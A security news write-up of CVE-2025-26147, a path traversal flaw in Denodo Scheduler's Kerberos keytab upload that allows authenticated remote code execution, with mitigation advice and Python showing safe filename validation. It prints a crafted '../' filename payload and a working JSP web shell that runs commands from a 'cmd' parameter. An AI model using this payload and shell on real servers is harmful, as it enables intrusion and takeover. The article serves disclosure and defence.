Critical Denodo Scheduler Flaw Allows Remote Code Execution by Attackers
Denodo, a provider of logical data management software, recently faced a critical security vulnerability in its Denodo Scheduler product.
This vulnerability, tracked as CVE-2025-26147, allows authenticated users to perform remote code execution (RCE) on affected systems, posing significant risks to organizations relying on this scheduling tool for data extraction and integration jobs.
Introduction to Denodo Scheduler and Its Vulnerability
Denodo Scheduler is a Java-based web application designed to automate and manage data extraction and integration tasks on Denodo Virtual DataPort servers.
It supports scheduling batch jobs, generating detailed execution reports, exporting results to various formats, and handling authentication configurations, including Kerberos authentication—a secure network protocol employing tickets and symmetric-key cryptography for authentication without passwords.
The vulnerability arises in the Scheduler’s feature that allows administrators to upload Kerberos keytab files for authentication.
Keytab files store encrypted service principal credentials, enabling passwordless authentication.
The HTTP request used for uploading these files is a multipart form data POST request, where the filename parameter in the Content-Disposition header is susceptible to a path traversal attack.
This attack manipulates the filename value using sequences like “../” to traverse directories and write files outside the intended upload directory.
For example, an attacker can craft a filename such as:
filename="../../../../opt/denodo/malicious.file.txt"
Although Denodo Scheduler appends a timestamp to the uploaded filename (e.g., malicious.file-1711156561716.txt), the exact filename is returned in the HTTP response, enabling attackers to locate the file without guessing the timestamp.
Exploiting the Vulnerability for RCE
With the ability to write arbitrary files anywhere on the server’s filesystem, attackers can escalate this vulnerability to achieve remote code execution.
The Denodo Scheduler runs on an Apache Tomcat server, a Java-based HTTP web server environment that executes JavaServer Pages (JSP).
Attackers can upload a malicious JSP web shell to the Tomcat web root directory, typically found at:
/path/to/webroot/resources/apache-tomcat/webapps/ROOT/
A simple Java web shell example that executes commands passed via the HTTP GET parameter cmd is:
<%
    // Read the 'cmd' query parameter and run it as an OS command.
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        java.io.InputStream is = p.getInputStream();
        // The "\\A" (start-of-input) delimiter makes the Scanner return the whole stream as one token.
        java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
        String output = s.hasNext() ? s.next() : "";
        response.getWriter().println(output);
    }
%>
Once uploaded, this web shell allows remote execution of system commands by accessing the shell URL with the desired command, such as id to retrieve user identity information.
Technical Summary and Mitigation
| Aspect | Details |
|---|---|
| Vendor | Denodo |
| Product | Denodo Scheduler |
| Vulnerable Version | v8.0.202309140 |
| Fixed Version | Denodo 8.0 update: denodo-v80-update-20240307 |
| Vulnerability Type | Path Traversal leading to Authenticated Remote Code Execution (CVE-2025-26147) |
| Attack Vector | Multipart form data POST request uploading Kerberos keytab files with crafted filename |
| Affected Component | Kerberos authentication keytab file upload feature |
| Underlying Server | Apache Tomcat |
| Exploit Payload | Java JSP web shell allowing command execution via HTTP GET parameter |
| Mitigation | Upgrade to fixed Denodo Scheduler version; restrict file upload paths; validate filenames |
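The path traversal root cause described above (a client-controlled multipart filename joined under the upload directory) and the "validate filenames" row of the table can be illustrated with the following Python. It is an added example, not Denodo's code: a naive join that lets the crafted filename from the write-up escape the upload directory sits beside a hardened version that rejects traversal and separator characters, restricts the character set, generates the timestamped name on the server, and re-checks containment before writing. The upload directory path, the function names and the .keytab extension requirement are assumptions.

```python
import os
import re
import time
from pathlib import Path
from typing import Optional

# Assumed upload directory; the Scheduler's real keytab location is not on the page.
UPLOAD_DIR = Path("/opt/denodo/scheduler/keytabs")

# Conservative allow-list for a client-supplied name: must start alphanumeric and
# contain only letters, digits, dot, dash and underscore.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def naive_destination(client_filename: str, upload_dir: Path = UPLOAD_DIR) -> Path:
    """The vulnerable pattern: the multipart filename is joined under the upload
    directory as-is, so '../' segments walk out of it. Kept only to show the
    escape; do not use this in real code."""
    return Path(os.path.normpath(upload_dir / client_filename))


def escapes_upload_dir(candidate: Path, upload_dir: Path = UPLOAD_DIR) -> bool:
    """True when a destination does not sit directly inside upload_dir."""
    root = Path(os.path.normpath(upload_dir))
    return Path(os.path.normpath(candidate)).parent != root


def safe_keytab_name(client_filename: str) -> str:
    """Accept a client-supplied filename only if it cannot influence the directory.
    Rejects rather than 'cleans', so a traversal attempt fails loudly and is loggable."""
    if not client_filename or "\x00" in client_filename:
        raise ValueError("empty or NUL-containing filename")
    if "/" in client_filename or "\\" in client_filename or ".." in client_filename:
        raise ValueError("path separator or traversal sequence in filename")
    if not _SAFE_NAME.match(client_filename):
        raise ValueError("filename contains disallowed characters")
    if not client_filename.lower().endswith(".keytab"):
        raise ValueError("only .keytab uploads are accepted")  # assumed policy
    return client_filename


def resolve_upload_path(client_filename: str, upload_dir: Path = UPLOAD_DIR,
                        now_ms: Optional[int] = None) -> Path:
    """Hardened pattern: validate the name, build the timestamped filename on the
    server (mirroring the product's '<name>-<millis>.<ext>' convention), then
    re-check containment as defence in depth."""
    name = safe_keytab_name(client_filename)
    stem, ext = os.path.splitext(name)
    if now_ms is None:
        now_ms = int(time.time() * 1000)
    target = Path(os.path.normpath(upload_dir / f"{stem}-{now_ms}{ext}"))
    if escapes_upload_dir(target, upload_dir):
        raise ValueError("destination escaped the upload directory")
    return target


if __name__ == "__main__":
    crafted = "../../../../opt/denodo/malicious.file.txt"  # the filename from the write-up
    naive = naive_destination(crafted)
    print("naive join ->", naive, "| escapes upload dir:", escapes_upload_dir(naive))
    try:
        resolve_upload_path(crafted)
    except ValueError as err:
        print("hardened upload rejected it:", err)
    print("hardened upload ->", resolve_upload_path("service.keytab", now_ms=1711156561716))
```

The containment check uses os.path.normpath rather than Path.resolve so it behaves the same whether or not the directory exists; in a deployed handler, resolving symlinks with realpath before the comparison is the stricter choice. The key design point is that the client name is never used to choose a directory: it is validated against an allow-list and the server composes the final path itself.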
The vulnerability was responsibly disclosed by security researchers John De Armas and Morgan Backus, and Denodo responded promptly by releasing a security update to fix the issue.
This incident underscores how a seemingly minor flaw in file upload handling can escalate into a critical remote code execution vulnerability, threatening the confidentiality, integrity, and availability of enterprise data services.
It highlights the necessity of secure coding practices, rigorous input validation, and timely patching in software development and deployment.
Organizations using Denodo Scheduler are strongly advised to upgrade to the fixed version (denodo-v80-update-20240307) immediately and review their server configurations to prevent exploitation.
Staying informed through security advisories and following best practices in authentication and file handling remain vital defenses against such threats.
For ongoing updates and security research, follow Rhino Security Labs on Twitter and LinkedIn.
This article is based on detailed research and analysis by Rhino Security Labs and Denodo community documentation.